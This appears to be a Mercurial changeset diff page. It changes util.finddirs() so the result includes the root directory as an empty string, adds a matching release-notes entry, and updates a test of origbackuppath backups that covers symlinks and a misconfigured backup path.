3181 3181
3182 3182 def addpath(self, path):
3183 3183 dirs = self._dirs
3184 3184 for base in finddirs(path):
3185 3185 if base in dirs:
3186 3186 dirs[base] += 1
3187 3187 return
3188 3188 dirs[base] = 1
3189 3189
3190 3190 def delpath(self, path):
3191 3191 dirs = self._dirs
3192 3192 for base in finddirs(path):
3193 3193 if dirs[base] > 1:
3194 3194 dirs[base] -= 1
3195 3195 return
3196 3196 del dirs[base]
3197 3197
3198 3198 def __iter__(self):
3199 3199 return iter(self._dirs)
3200 3200
3201 3201 def __contains__(self, d):
3202 3202 return d in self._dirs
3203 3203
3204 3204 if safehasattr(parsers, 'dirs'):
3205 3205 dirs = parsers.dirs
3206 3206
3207 3207 def finddirs(path):
3208 3208 pos = path.rfind('/')
3209 3209 while pos != -1:
3210 3210 yield path[:pos]
3211 3211 pos = path.rfind('/', 0, pos)
3212 yield ''
3212 3213
3213 3214
3214 3215 # convenient shortcut
3215 3216 dst = debugstacktrace
3216 3217
3217 3218 def safename(f, tag, ctx, others=None):
3218 3219 """
3219 3220 Generate a name that it is safe to rename f to in the given context.
3220 3221
3221 3222 f: filename to rename
3222 3223 tag: a string tag that will be included in the new name
3223 3224 ctx: a context, in which the new name must not exist
3224 3225 others: a set of other filenames that the new name must not be in
3225 3226
3226 3227 Returns a file name of the form oldname~tag[~number] which does not exist
3227 3228 in the provided context and is not in the set of other names.
3228 3229 """
3229 3230 if others is None:
3230 3231 others = set()
3231 3232
3232 3233 fn = '%s~%s' % (f, tag)
3233 3234 if fn not in ctx and fn not in others:
3234 3235 return fn
3235 3236 for n in itertools.count(1):
3236 3237 fn = '%s~%s~%s' % (f, tag, n)
3237 3238 if fn not in ctx and fn not in others:
3238 3239 return fn
3239 3240
3240 3241 def readexactly(stream, n):
3241 3242 '''read n bytes from stream.read and abort if less was available'''
3242 3243 s = stream.read(n)
3243 3244 if len(s) < n:
3244 3245 raise error.Abort(_("stream ended unexpectedly"
3245 3246 " (got %d bytes, expected %d)")
3246 3247 % (len(s), n))
3247 3248 return s
3248 3249
3249 3250 def uvarintencode(value):
3250 3251 """Encode an unsigned integer value to a varint.
3251 3252
3252 3253 A varint is a variable length integer of 1 or more bytes. Each byte
3253 3254 except the last has the most significant bit set. The lower 7 bits of
3254 3255 each byte store the 2's complement representation, least significant group
3255 3256 first.
3256 3257
3257 3258 >>> uvarintencode(0)
3258 3259 '\\x00'
3259 3260 >>> uvarintencode(1)
3260 3261 '\\x01'
3261 3262 >>> uvarintencode(127)
3262 3263 '\\x7f'
3263 3264 >>> uvarintencode(1337)
3264 3265 '\\xb9\\n'
3265 3266 >>> uvarintencode(65536)
3266 3267 '\\x80\\x80\\x04'
3267 3268 >>> uvarintencode(-1)
3268 3269 Traceback (most recent call last):
3269 3270 ...
3270 3271 ProgrammingError: negative value for uvarint: -1
3271 3272 """
3272 3273 if value < 0:
3273 3274 raise error.ProgrammingError('negative value for uvarint: %d'
3274 3275 % value)
3275 3276 bits = value & 0x7f
3276 3277 value >>= 7
3277 3278 bytes = []
3278 3279 while value:
3279 3280 bytes.append(pycompat.bytechr(0x80 | bits))
3280 3281 bits = value & 0x7f
3281 3282 value >>= 7
3282 3283 bytes.append(pycompat.bytechr(bits))
3283 3284
3284 3285 return ''.join(bytes)
3285 3286
3286 3287 def uvarintdecodestream(fh):
3287 3288 """Decode an unsigned variable length integer from a stream.
3288 3289
3289 3290 The passed argument is anything that has a ``.read(N)`` method.
3290 3291
3291 3292 >>> try:
3292 3293 ... from StringIO import StringIO as BytesIO
3293 3294 ... except ImportError:
3294 3295 ... from io import BytesIO
3295 3296 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3296 3297 0
3297 3298 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3298 3299 1
3299 3300 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3300 3301 127
3301 3302 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3302 3303 1337
3303 3304 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3304 3305 65536
3305 3306 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3306 3307 Traceback (most recent call last):
3307 3308 ...
3308 3309 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3309 3310 """
3310 3311 result = 0
3311 3312 shift = 0
3312 3313 while True:
3313 3314 byte = ord(readexactly(fh, 1))
3314 3315 result |= ((byte & 0x7f) << shift)
3315 3316 if not (byte & 0x80):
3316 3317 return result
3317 3318 shift += 7
@@ -1,34 +1,37
1 1 == New Features ==
2 2
3 3 * New config `commands.commit.post-status` shows status after successful
4 4 commit.
5 5
6 6
7 7 == New Experimental Features ==
8 8
9 9 * New config `experimental.log.topo` makes `hg log -G` use
10 10 topological sorting. This is especially useful for aliases since it
11 11 lets the alias accept an `-r` option while still using topological
12 12 sorting with or without the `-r` (unlike if you use the `sort(...,
13 13 topo)` revset).
14 14
15 15
16 16 == Bug Fixes ==
17 17
18 18
19 19 == Backwards Compatibility Changes ==
20 20
21 21 * Removed (experimental) support for log graph lines mixing
22 22 parent/grandparent styles. Setting
23 23 e.g. `experimental.graphstyle.parent = !` and
24 24 `experimental.graphstyle.grandparent = 3.` would use `!` for the
25 25 first three lines of the graph and then `.`. This is no longer
26 26 supported.
27 27
28 28
29 29 == Internal API Changes ==
30 30
31 31 * Matchers are no longer iterable. Use `match.files()` instead.
32 32
33 33 * `match.visitdir()` and `match.visitchildrenset()` now expect the
34 34 empty string instead of '.' to indicate the root directory.
35
36 * `util.dirs()` and `util.finddirs()` now include an entry for the
37 root directory (empty string).
@@ -1,136 +1,137
1 1 Set up repo
2 2
3 3 $ cat << EOF >> $HGRCPATH
4 4 > [ui]
5 5 > origbackuppath=.hg/origbackups
6 6 > [merge]
7 7 > checkunknown=warn
8 8 > EOF
9 9 $ hg init repo
10 10 $ cd repo
11 11 $ echo base > base
12 12 $ hg add base
13 13 $ hg commit -m "base"
14 14
15 15 Make a dir named b that contains a file, and a file named d
16 16
17 17 $ mkdir -p b
18 18 $ echo c1 > b/c
19 19 $ echo d1 > d
20 20 $ hg add b/c d
21 21 $ hg commit -m "c1"
22 22 $ hg bookmark c1
23 23
24 24 Peform an update that causes b/c to be backed up
25 25
26 26 $ hg up -q 0
27 27 $ mkdir -p b
28 28 $ echo c2 > b/c
29 29 $ hg up --verbose c1
30 30 resolving manifests
31 31 b/c: replacing untracked file
32 32 getting b/c
33 33 creating directory: $TESTTMP/repo/.hg/origbackups/b
34 34 getting d
35 35 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
36 36 (activating bookmark c1)
37 37 $ test -f .hg/origbackups/b/c
38 38
39 39 Make files named b and d
40 40
41 41 $ hg up -q 0
42 42 $ echo b1 > b
43 43 $ echo d2 > d
44 44 $ hg add b d
45 45 $ hg commit -m b1
46 46 created new head
47 47 $ hg bookmark b1
48 48
49 49 Perform an update that causes b to be backed up - it should replace the backup b dir
50 50
51 51 $ hg up -q 0
52 52 $ echo b2 > b
53 53 $ hg up --verbose b1
54 54 resolving manifests
55 55 b: replacing untracked file
56 56 getting b
57 57 removing conflicting directory: $TESTTMP/repo/.hg/origbackups/b
58 58 getting d
59 59 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
60 60 (activating bookmark b1)
61 61 $ test -f .hg/origbackups/b
62 62
63 63 Perform an update the causes b/c to be backed up again - it should replace the backup b file
64 64
65 65 $ hg up -q 0
66 66 $ mkdir b
67 67 $ echo c3 > b/c
68 68 $ hg up --verbose c1
69 69 resolving manifests
70 70 b/c: replacing untracked file
71 71 getting b/c
72 72 creating directory: $TESTTMP/repo/.hg/origbackups/b
73 73 removing conflicting file: $TESTTMP/repo/.hg/origbackups/b
74 74 getting d
75 75 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
76 76 (activating bookmark c1)
77 77 $ test -d .hg/origbackups/b
78 78
79 79 Cause two symlinks to be backed up that points to a valid location from the backup dir
80 80
81 81 $ hg up -q 0
82 82 $ mkdir ../sym-link-target
83 83 #if symlink
84 84 $ ln -s ../../../sym-link-target b
85 85 $ ln -s ../../../sym-link-target d
86 86 #else
87 87 $ touch b d
88 88 #endif
89 89 $ hg up b1
90 90 b: replacing untracked file
91 91 d: replacing untracked file
92 92 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
93 93 (activating bookmark b1)
94 94 #if symlink
95 95 $ readlink.py .hg/origbackups/b
96 96 .hg/origbackups/b -> ../../../sym-link-target
97 97 #endif
98 98
99 99 Perform an update that causes b/c and d to be backed up again - b/c should not go into the target dir
100 100
101 101 $ hg up -q 0
102 102 $ mkdir b
103 103 $ echo c4 > b/c
104 104 $ echo d3 > d
105 105 $ hg up --verbose c1
106 106 resolving manifests
107 107 b/c: replacing untracked file
108 108 d: replacing untracked file
109 109 getting b/c
110 110 creating directory: $TESTTMP/repo/.hg/origbackups/b
111 111 removing conflicting file: $TESTTMP/repo/.hg/origbackups/b
112 112 getting d
113 113 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
114 114 (activating bookmark c1)
115 115 $ cat .hg/origbackups/b/c
116 116 c4
117 117 $ cat .hg/origbackups/d
118 118 d3
119 119 $ ls ../sym-link-target
120 120
121 121 Incorrectly configure origbackuppath to be under a file
122 122
123 123 $ echo data > .hg/badorigbackups
124 124 $ hg up -q 0
125 125 $ mkdir b
126 126 $ echo c5 > b/c
127 127 $ hg up --verbose c1 --config ui.origbackuppath=.hg/badorigbackups
128 128 resolving manifests
129 129 b/c: replacing untracked file
130 130 getting b/c
131 131 creating directory: $TESTTMP/repo/.hg/badorigbackups/b
132 abort: $ENOTDIR$: *$TESTTMP/repo/.hg/badorigbackups/b* (glob)
133 [255]
134 $ cat .hg/badorigbackups
135 data
136
132 removing conflicting file: $TESTTMP/repo/.hg/badorigbackups
133 getting d
134 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
135 (activating bookmark c1)
136 $ ls .hg/badorigbackups/b
137 c
General Comments 0
You need to be logged in to leave comments. Login now